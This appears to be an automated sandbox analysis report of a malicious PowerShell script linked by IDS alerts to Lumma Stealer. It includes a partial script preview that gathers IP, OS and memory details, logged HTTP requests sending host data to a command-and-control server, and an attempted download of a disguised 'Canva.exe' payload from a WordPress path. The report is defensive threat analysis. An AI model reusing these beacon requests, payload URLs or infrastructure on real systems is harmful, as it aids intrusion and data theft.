                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.710920439852509
                                    Encrypted:false
                                    SSDEEP:48:JOWWCjCPbU2K+DjukvhkvklCywDn22Yfpy+L7BNSogZoKWYfpy+L7BNSogZo+1:gW/jCooWkvhkvCCt+fpJLSHlfpJLSH5
                                    MD5:087818FF8B36CF500519D9FE7A2FDE34
                                    SHA1:8CFBCF2581BCC3B460048FBCDD08F7EF3352122A
                                    SHA-256:35052500F334A9BE165A70A9869CF29102CB51FB52C4C00157CA6D2B071DFB83
                                    SHA-512:0E5E90D4EEE735E85AE314705044FCC5DCDC720EBABAC211AAD193D994E2E09CEC990AFC50FA0AE02FB0AA52D6D913C822CD0E04BEF2FB4644DCCC50F205C692
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M...........|........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlRZh;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....RZk;..Roaming.@......DWSlRZk;....C.....................Up..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlRZh;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSlRZh;....E......................*..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlRZh;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlRZh;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

                                    Static File Info

                                    General

                                    File type:ASCII text, with very long lines (743), with no line terminators
                                    Entropy (8bit):5.361269025932874
                                    TrID:
                                      File name:oNvY66Z8jp.ps1
                                      File size:743 bytes
                                      MD5:979fbff01ba40f65e4eae87012b024a0
                                      SHA1:4ff2c55e9b40206244f6f93b097a818cffb0d6d2
                                      SHA256:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d
                                      SHA512:6efd7b33d1e0d33237195347f434e9056f41046737410be8a9598353578be3a470e310d581d7bfe864af69c05ff89e7ad52af44490478b0ef7756c14012061c6
                                      SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG3m6x+S+IvT/Iy5hu1M4AGsL:BP3wEqHu25xxUlpLhNHAf3m6WQT/H5h9
                                      TLSH:5201DC31B73C828483D5C860B8B9B702C1877B40EA6EECFC25EC3000C6832E13DA4A18
                                      File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T

                                      File Icon

                                      Icon Hash:3270d6baae77db44

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-02-18T08:27:29.827006+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549704104.26.12.20580TCP
                                      2025-02-18T08:27:32.048026+01002860232ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)1192.168.2.54970591.206.178.1205001TCP
                                      2025-02-18T08:27:32.048026+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.54970591.206.178.1205001TCP
                                      2025-02-18T08:27:32.048110+01002860233ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)191.206.178.1205001192.168.2.549705TCP
                                      2025-02-18T08:27:32.949584+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549706172.67.149.252443TCP
                                      2025-02-18T08:27:32.949584+01002021697ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious1192.168.2.549706172.67.149.252443TCP
                                      2025-02-18T08:27:33.894508+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.54970791.206.178.1205001TCP
                                      2025-02-18T08:27:33.894508+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.54970791.206.178.1205001TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 18, 2025 08:27:29.287914991 CET4970480192.168.2.5104.26.12.205
                                      Feb 18, 2025 08:27:29.292819977 CET8049704104.26.12.205192.168.2.5
                                      Feb 18, 2025 08:27:29.292892933 CET4970480192.168.2.5104.26.12.205
                                      Feb 18, 2025 08:27:29.294413090 CET4970480192.168.2.5104.26.12.205
                                      Feb 18, 2025 08:27:29.299273968 CET8049704104.26.12.205192.168.2.5
                                      Feb 18, 2025 08:27:29.775172949 CET8049704104.26.12.205192.168.2.5
                                      Feb 18, 2025 08:27:29.827006102 CET4970480192.168.2.5104.26.12.205
                                      Feb 18, 2025 08:27:30.920710087 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:30.925585032 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:30.925662994 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:30.925812006 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:30.930573940 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:32.037771940 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:32.047979116 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:32.048026085 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:32.048110008 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:32.048154116 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:32.054188967 CET497055001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:32.058970928 CET50014970591.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:32.083800077 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.083844900 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.083904028 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.105271101 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.105293989 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.576041937 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.576144934 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.581047058 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.581063986 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.581434011 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.601953030 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.643341064 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.949596882 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.949713945 CET44349706172.67.149.252192.168.2.5
                                      Feb 18, 2025 08:27:32.949939966 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:32.982810974 CET49706443192.168.2.5172.67.149.252
                                      Feb 18, 2025 08:27:33.203931093 CET497075001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:33.208828926 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:33.210850000 CET497075001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:33.214157104 CET497075001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:33.218960047 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:33.884543896 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:33.894414902 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:33.894437075 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:33.894507885 CET497075001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:33.911699057 CET497075001192.168.2.591.206.178.120
                                      Feb 18, 2025 08:27:33.916495085 CET50014970791.206.178.120192.168.2.5
                                      Feb 18, 2025 08:27:34.169028044 CET4970480192.168.2.5104.26.12.205

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 18, 2025 08:27:29.273791075 CET5394053192.168.2.51.1.1.1
                                      Feb 18, 2025 08:27:29.280877113 CET53539401.1.1.1192.168.2.5
                                      Feb 18, 2025 08:27:32.061628103 CET5151253192.168.2.51.1.1.1
                                      Feb 18, 2025 08:27:32.082998037 CET53515121.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Feb 18, 2025 08:27:29.273791075 CET192.168.2.51.1.1.10x3059Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Feb 18, 2025 08:27:32.061628103 CET192.168.2.51.1.1.10xd46Standard query (0)hostelaunpaso.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Feb 18, 2025 08:27:29.280877113 CET1.1.1.1192.168.2.50x3059No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                      Feb 18, 2025 08:27:29.280877113 CET1.1.1.1192.168.2.50x3059No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                      Feb 18, 2025 08:27:29.280877113 CET1.1.1.1192.168.2.50x3059No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                      Feb 18, 2025 08:27:32.082998037 CET1.1.1.1192.168.2.50xd46No error (0)hostelaunpaso.com172.67.149.252A (IP address)IN (0x0001)false
                                      Feb 18, 2025 08:27:32.082998037 CET1.1.1.1192.168.2.50xd46No error (0)hostelaunpaso.com104.21.29.239A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • hostelaunpaso.com
                                      • api.ipify.org
                                      • 91.206.178.120:5001

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704104.26.12.205805676C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Feb 18, 2025 08:27:29.294413090 CET158OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      Feb 18, 2025 08:27:29.775172949 CET431INHTTP/1.1 200 OK
                                      Date: Tue, 18 Feb 2025 07:27:29 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: keep-alive
                                      Vary: Origin
                                      cf-cache-status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 913c4b82b8b08c29-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2061&min_rtt=2061&rtt_var=1030&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.54970591.206.178.12050015676C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Feb 18, 2025 08:27:30.925812006 CET264OUTGET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: 91.206.178.120:5001
                                      Connection: Keep-Alive
                                      Feb 18, 2025 08:27:32.037771940 CET174INHTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.10.12
                                      Date: Tue, 18 Feb 2025 07:27:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 21
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.54970791.206.178.12050015676C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Feb 18, 2025 08:27:33.214157104 CET170OUTGET /script_end?random_number=91530 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: 91.206.178.120:5001
                                      Feb 18, 2025 08:27:33.884543896 CET174INHTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.10.12
                                      Date: Tue, 18 Feb 2025 07:27:33 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 19
                                      Connection: close


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549706172.67.149.2524435676C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2025-02-18 07:27:32 UTC246OUTGET /wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: hostelaunpaso.com
                                      Connection: Keep-Alive
                                      2025-02-18 07:27:32 UTC869INHTTP/1.1 403 Forbidden
                                      Date: Tue, 18 Feb 2025 07:27:32 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=15768000; includeSubDomains
                                      cf-cache-status: BYPASS
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzbYHRAAxRQwPViaa0Jrqj8yy13yAZ1OBap9FJFhjh9sL9TpCvVg1PyAW3OZLJHk9mzXqt6Ou9%2FtQ3vrC5dkMWLB5Pr4f6vjcrblJX81xLBqmeiG98dYijoZCIXU%2FW7H2EmSDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 913c4b951a752394-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1934&rtt_var=734&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=860&delivery_rate=1481481&cwnd=252&unsent_bytes=0&cid=f72ead2660dac038&ts=393&x=0"
                                      2025-02-18 07:27:32 UTC500INData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72
                                      Data Ascii: 31b<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>403 Forbidden</title> <link r
                                      2025-02-18 07:27:32 UTC302INData Raw: 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f
                                      Data Ascii: this document.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</
                                      2025-02-18 07:27:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:02:27:26
                                      Start date:18/02/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
                                      Imagebase:0xac0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:02:27:27
                                      Start date:18/02/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:02:27:27
                                      Start date:18/02/2025
                                      Path:C:\Windows\System32\notepad.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
                                      Imagebase:0x7ff7144b0000
                                      File size:201'216 bytes
                                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 06F42AC8 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q
                                        • API String ID: 0-1785108022
                                        • Opcode ID: c52428738af162d1c0a7aedc3721e237a00c24bfda4d8aa22546b1427065c56b
                                        • Instruction ID: 3a4654dad837ce9e81aabb2fcee838ce55e6c5395f2ed78667cfa39c2f4f71e0
                                        • Opcode Fuzzy Hash: c52428738af162d1c0a7aedc3721e237a00c24bfda4d8aa22546b1427065c56b
                                        • Instruction Fuzzy Hash: C0125932F042048FD765AB78881177ABFA6EFC1321F1484BAE505DBA91DB31DA41C7E6
                                        Function 06F4596D Relevance: 3.8, Strings: 3, Instructions: 59COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q
                                        • API String ID: 0-705557208
                                        • Opcode ID: 4664443e749f970152e5d46eb16f5a2e6a125cea233c60b37713377b38c70964
                                        • Instruction ID: 7ffb2483adc4aa5ec5578cdf1810973a1bce49462a63f3f6537b382e8d722bcf
                                        • Opcode Fuzzy Hash: 4664443e749f970152e5d46eb16f5a2e6a125cea233c60b37713377b38c70964
                                        • Instruction Fuzzy Hash: EA11FEB1F0A350DFD7BA372454602653F945F5793031905ABD442CFAD9DA2B8C45C7E2
                                        Function 06F4587D Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: 286169fde3618c040c2beeb4d26156098ef0670a17a82610c67ce38017ced36c
                                        • Instruction ID: 3216f67439cea6d7608dfb28498a0da1f172d10b69f04ecbadb4ddb6536a8a54
                                        • Opcode Fuzzy Hash: 286169fde3618c040c2beeb4d26156098ef0670a17a82610c67ce38017ced36c
                                        • Instruction Fuzzy Hash: 1421B7B2A8B7945FC75A37A434B01A13FD8CF4323035A04AAD0558FEA5C922C886C3A8
                                        Function 06F458F5 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: 86d5fbef094639b85a9692cdae5ae4f6e1f1250b0b560ac6a0e2491872221905
                                        • Instruction ID: 0be690b258b3d57a2b15bb3a8c5043de8f4fcb5204925f4cd45564caf296374c
                                        • Opcode Fuzzy Hash: 86d5fbef094639b85a9692cdae5ae4f6e1f1250b0b560ac6a0e2491872221905
                                        • Instruction Fuzzy Hash: C5012871B0F3409FD7A6372418202613FAD5F4BA2071649DBD481CF6D9CD268C88C7A3
                                        Function 06F40CD1 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: d341dba1f7f8119ada715dd290c4f87e661dc013f6ed56b660c506d380c079da
                                        • Instruction ID: 32c476aa378eefe6ab31bfe8d468b588fd654000ab886194ee384ec2275418ab
                                        • Opcode Fuzzy Hash: d341dba1f7f8119ada715dd290c4f87e661dc013f6ed56b660c506d380c079da
                                        • Instruction Fuzzy Hash: 3101D871A4E3964FD3A7172C1850116AFF25FD35107294897CA81CF563CD385C49C7A3
                                        Function 06F4580B Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: b3072d01583e7a8238dedf487af40aa68c3f7a1a7507a24164c2e2f77cd58bfd
                                        • Instruction ID: 87b110d6e33cef7f128a32452af5ec124eb7febd509d80b793fa2695ae4525dd
                                        • Opcode Fuzzy Hash: b3072d01583e7a8238dedf487af40aa68c3f7a1a7507a24164c2e2f77cd58bfd
                                        • Instruction Fuzzy Hash: 10F0B430F79609CFDAA47A24959422A3ED9AF41B10B50092DD8425B994CF35DC45CBC6
                                        Function 046AF058 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 861476d03fc9d6de3504acb5340766ac6c288b3182d8f4bc5ceebed1fedb20ec
                                        • Instruction ID: 344dcef5cf35aacf21f0d19a0c0ce32d350cc02b544e4bef985ea7be352de973
                                        • Opcode Fuzzy Hash: 861476d03fc9d6de3504acb5340766ac6c288b3182d8f4bc5ceebed1fedb20ec
                                        • Instruction Fuzzy Hash: 69F0D6323483402BD718A735AC51B9E3B5BAFC5710F544969E0455B297CD64BC0947A6
                                        Function 046AF068 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 969a8d7e86a72a9c1421b8d6343aa10dd2aa581fd29fdd6b0d09918945fb6220
                                        • Instruction ID: a185c3c8e0bbaf5546cd6e196b5525ce0619b2f010a00e251a2d20e5fbaf9f64
                                        • Opcode Fuzzy Hash: 969a8d7e86a72a9c1421b8d6343aa10dd2aa581fd29fdd6b0d09918945fb6220
                                        • Instruction Fuzzy Hash: 9CF0F6313443002BD71CA639AC91B5E379BEFC4B10F504978E1065B3D6CEA0FC094395
                                        Function 06F40D78 Relevance: .2, Instructions: 203COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49cbb9b5529cec314ba7564684f8284b8c9c3c7b98b14a9d900efec3e28fcb62
                                        • Instruction ID: 95cd3a3d35f932e1cb7a59d3f52381311faff0cf161b64f52916d3e6043ff0d9
                                        • Opcode Fuzzy Hash: 49cbb9b5529cec314ba7564684f8284b8c9c3c7b98b14a9d900efec3e28fcb62
                                        • Instruction Fuzzy Hash: 0D515632B043059FDB606B2888507BBBFA6DFC1321F14847AE645DBA91DF76C851C7A2
                                        Function 046ABACF Relevance: .2, Instructions: 157COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a486c35df0050221bbe240f282a3dd00e6033b853531f0249375ca01a24eb69
                                        • Instruction ID: da961d6146d2802d89a702a97c17ef51e0dae8119bca6072913dbddfcfbf882d
                                        • Opcode Fuzzy Hash: 0a486c35df0050221bbe240f282a3dd00e6033b853531f0249375ca01a24eb69
                                        • Instruction Fuzzy Hash: 6951A5716002049FDB05DF79D9507EEBBFAEF89300F14846AD805AB396DB359D41CBA0
                                        Function 06F42AAD Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
